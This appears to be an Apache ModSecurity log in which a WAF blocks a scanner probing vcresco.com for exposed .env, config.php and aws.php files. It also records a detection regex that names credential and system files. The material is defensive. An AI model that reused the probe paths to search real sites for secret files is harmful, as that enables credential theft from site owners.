[Tue May 26 13:04:01.318802 2026] [security2:error] [pid 470766:tid 471019] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ejO_W1DqEcFHQ7_KwAAAHs"]
[Tue May 26 13:04:01.321198 2026] [security2:error] [pid 470766:tid 471020] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ejO_W1DqEcFHQ7_QQAAAHw"]
[Tue May 26 13:04:01.321400 2026] [security2:error] [pid 470766:tid 470960] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ejO_W1DqEcFHQ7_NQAAQAc"]
[Tue May 26 13:04:01.321557 2026] [security2:error] [pid 470766:tid 470960] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ejO_W1DqEcFHQ7_MgAAQAI"]
[Tue May 26 13:04:01.325918 2026] [security2:error] [pid 470766:tid 471003] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ejO_W1DqEcFHQ7_RQAAAGs"]
[Tue May 26 13:04:01.454661 2026] [security2:error] [pid 470766:tid 470962] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ejO_W1DqEcFHQ7_UgAAQgU"]
[Tue May 26 13:04:01.472636 2026] [security2:error] [pid 470766:tid 470947] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ejO_W1DqEcFHQ7_WAAAADM"]
[Tue May 26 13:04:01.489833 2026] [security2:error] [pid 470766:tid 470923] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ejO_W1DqEcFHQ7_WQAAABs"]
[Tue May 26 13:04:01.491669 2026] [security2:error] [pid 470766:tid 470858] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/back-end/.env"] [unique_id "ahVM6ejO_W1DqEcFHQ7_awAAQls"]
[Tue May 26 13:04:01.491907 2026] [security2:error] [pid 470766:tid 470871] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/back-api/.env"] [unique_id "ahVM6ejO_W1DqEcFHQ7_agAAQmg"]
[Tue May 26 13:04:01.502134 2026] [security2:error] [pid 470766:tid 470944] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ejO_W1DqEcFHQ7_WgAAADA"]
[Tue May 26 13:04:01.516115 2026] [security2:error] [pid 470766:tid 470869] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/back/.env"] [unique_id "ahVM6ejO_W1DqEcFHQ7_bgAAQmY"]
[Tue May 26 13:04:01.529067 2026] [security2:error] [pid 470766:tid 470854] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/backend/.env"] [unique_id "ahVM6ejO_W1DqEcFHQ7_cAAAQlc"]
[Tue May 26 13:04:01.529083 2026] [security2:error] [pid 470766:tid 470842] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/backend-api/.env"] [unique_id "ahVM6ejO_W1DqEcFHQ7_bwAAQks"]
[Tue May 26 13:04:01.530027 2026] [security2:error] [pid 470766:tid 470922] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ejO_W1DqEcFHQ7_ZQAAABo"]
[Tue May 26 13:04:01.533817 2026] [security2:error] [pid 470766:tid 471000] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ejO_W1DqEcFHQ7_bAAAAGg"]
[Tue May 26 13:04:01.536571 2026] [security2:error] [pid 470766:tid 470921] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ejO_W1DqEcFHQ7_ZgAAABk"]
[Tue May 26 13:04:01.547204 2026] [security2:error] [pid 470766:tid 470976] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ejO_W1DqEcFHQ7_ZwAAAFA"]
[Tue May 26 13:04:01.548138 2026] [security2:error] [pid 470766:tid 470962] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ejO_W1DqEcFHQ7_aQAAQm4"]
[Tue May 26 13:04:01.564762 2026] [security2:error] [pid 470766:tid 470962] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ejO_W1DqEcFHQ7_cgAAQno"]
[Tue May 26 13:04:01.570469 2026] [security2:error] [pid 470766:tid 470893] [remote 185.177.72.30:19294] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/login.php"] [unique_id "ahVM6ejO_W1DqEcFHQ7_cwAAR34"]
[Tue May 26 13:04:01.583398 2026] [security2:error] [pid 470766:tid 470962] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ejO_W1DqEcFHQ7_cQAAQlc"]
[Tue May 26 13:04:01.641701 2026] [security2:error] [pid 470766:tid 470995] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ejO_W1DqEcFHQ7_dAAAY1Q"]
[Tue May 26 13:04:01.667126 2026] [security2:error] [pid 470766:tid 470995] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ejO_W1DqEcFHQ7_dQAAY2I"]
[Tue May 26 13:04:01.670035 2026] [security2:error] [pid 470766:tid 470995] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ejO_W1DqEcFHQ7_dgAAY2k"]
[Tue May 26 13:04:01.673214 2026] [security2:error] [pid 470766:tid 470995] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ejO_W1DqEcFHQ7_dwAAY2M"]
[Tue May 26 13:04:01.687326 2026] [security2:error] [pid 470766:tid 470995] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ejO_W1DqEcFHQ7_eQAAY3k"]
[Tue May 26 13:04:01.692207 2026] [security2:error] [pid 470766:tid 470995] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ejO_W1DqEcFHQ7_eAAAYxA"]
[Tue May 26 13:04:01.692660 2026] [security2:error] [pid 470766:tid 470799] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/be/.env"] [unique_id "ahVM6ejO_W1DqEcFHQ7_fwAAYyA"]
[Tue May 26 13:04:01.692973 2026] [security2:error] [pid 470766:tid 470792] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/backup/.env"] [unique_id "ahVM6ejO_W1DqEcFHQ7_fgAAYxk"]
[Tue May 26 13:04:01.693460 2026] [security2:error] [pid 470766:tid 470798] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/beta/.env"] [unique_id "ahVM6ejO_W1DqEcFHQ7_gAAAYx8"]
[Tue May 26 13:04:01.708410 2026] [security2:error] [pid 470766:tid 470995] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ejO_W1DqEcFHQ7_egAAY20"]
[Tue May 26 13:04:01.709882 2026] [security2:error] [pid 470766:tid 470995] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ejO_W1DqEcFHQ7_ewAAYw0"]
[Tue May 26 13:04:01.717870 2026] [security2:error] [pid 470766:tid 470995] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ejO_W1DqEcFHQ7_fAAAYxM"]
[Tue May 26 13:04:01.734772 2026] [security2:error] [pid 470766:tid 470983] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ejO_W1DqEcFHQ7_hgAAAFc"]
[Tue May 26 13:04:01.750036 2026] [security2:error] [pid 470766:tid 470900] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ejO_W1DqEcFHQ7_iQAAAAQ"]
[Tue May 26 13:04:01.755320 2026] [security2:error] [pid 470766:tid 470911] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ejO_W1DqEcFHQ7_iwAAAA8"]
[Tue May 26 13:04:01.785001 2026] [security2:error] [pid 470766:tid 470919] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ejO_W1DqEcFHQ7_kgAAABc"]
[Tue May 26 13:04:01.832998 2026] [security2:error] [pid 470766:tid 470785] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/client/.env"] [unique_id "ahVM6ejO_W1DqEcFHQ7_ngAAfBI"]
[Tue May 26 13:04:01.842786 2026] [security2:error] [pid 470766:tid 470887] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/cms/.env"] [unique_id "ahVM6ejO_W1DqEcFHQ7_pQAAfHg"]
[Tue May 26 13:04:01.865269 2026] [security2:error] [pid 470766:tid 470903] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ejO_W1DqEcFHQ7_nQAAAAc"]
[Tue May 26 13:04:01.875438 2026] [security2:error] [pid 470766:tid 471007] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ejO_W1DqEcFHQ7_oAAAAG8"]
[Tue May 26 13:04:01.879647 2026] [security2:error] [pid 470766:tid 470943] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ejO_W1DqEcFHQ7_nwAAAC8"]
[Tue May 26 13:04:01.887941 2026] [security2:error] [pid 470766:tid 471020] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ejO_W1DqEcFHQ7_ogAAfB0"]
[Tue May 26 13:04:01.891660 2026] [security2:error] [pid 470766:tid 470906] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ejO_W1DqEcFHQ7_qAAAAAo"]
[Tue May 26 13:04:01.896654 2026] [security2:error] [pid 470766:tid 470805] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vcresco.com"] [uri "/config.php"] [unique_id "ahVM6ejO_W1DqEcFHQ7_tgAAfCY"]
[Tue May 26 13:04:01.906683 2026] [security2:error] [pid 470766:tid 470918] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ejO_W1DqEcFHQ7_oQAAABY"]
[Tue May 26 13:04:01.911202 2026] [security2:error] [pid 470766:tid 470959] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ejO_W1DqEcFHQ7_tAAAAD8"]
[Tue May 26 13:04:01.913562 2026] [security2:error] [pid 470766:tid 471020] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ejO_W1DqEcFHQ7_tQAAfEA"]
[Tue May 26 13:04:01.914378 2026] [security2:error] [pid 470766:tid 470908] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ejO_W1DqEcFHQ7_sQAAAAw"]
[Tue May 26 13:04:01.914567 2026] [security2:error] [pid 470766:tid 471020] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ejO_W1DqEcFHQ7_rgAAfCE"]
[Tue May 26 13:04:01.921400 2026] [security2:error] [pid 470766:tid 470937] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ejO_W1DqEcFHQ7_swAAACk"]
[Tue May 26 13:04:01.944300 2026] [security2:error] [pid 470766:tid 470932] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ejO_W1DqEcFHQ7_uQAAACQ"]
[Tue May 26 13:04:01.973594 2026] [security2:error] [pid 470766:tid 470910] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ejO_W1DqEcFHQ7_vwAAAA4"]
[Tue May 26 13:04:02.022900 2026] [security2:error] [pid 470766:tid 470829] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/config/.env"] [unique_id "ahVM6ujO_W1DqEcFHQ7_ygAAaj4"]
[Tue May 26 13:04:02.024794 2026] [security2:error] [pid 470766:tid 471000] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ejO_W1DqEcFHQ7_wgAAAGg"]
[Tue May 26 13:04:02.029848 2026] [security2:error] [pid 470766:tid 470990] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ejO_W1DqEcFHQ7_xQAAAF4"]
[Tue May 26 13:04:02.051654 2026] [security2:error] [pid 470766:tid 470846] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vcresco.com"] [uri "/config/aws.php"] [unique_id "ahVM6ujO_W1DqEcFHQ7_1gAAak8"]
[Tue May 26 13:04:02.055494 2026] [security2:error] [pid 470766:tid 471002] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ujO_W1DqEcFHQ7_zAAAago"]
[Tue May 26 13:04:02.059203 2026] [security2:error] [pid 470766:tid 470814] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vcresco.com"] [uri "/config/config.inc.php"] [unique_id "ahVM6ujO_W1DqEcFHQ7_2QAAai8"]
[Tue May 26 13:04:02.064264 2026] [security2:error] [pid 470766:tid 470969] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ujO_W1DqEcFHQ7_zQAAAEk"]
[Tue May 26 13:04:02.076152 2026] [security2:error] [pid 470766:tid 471002] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ujO_W1DqEcFHQ7_0QAAai4"]
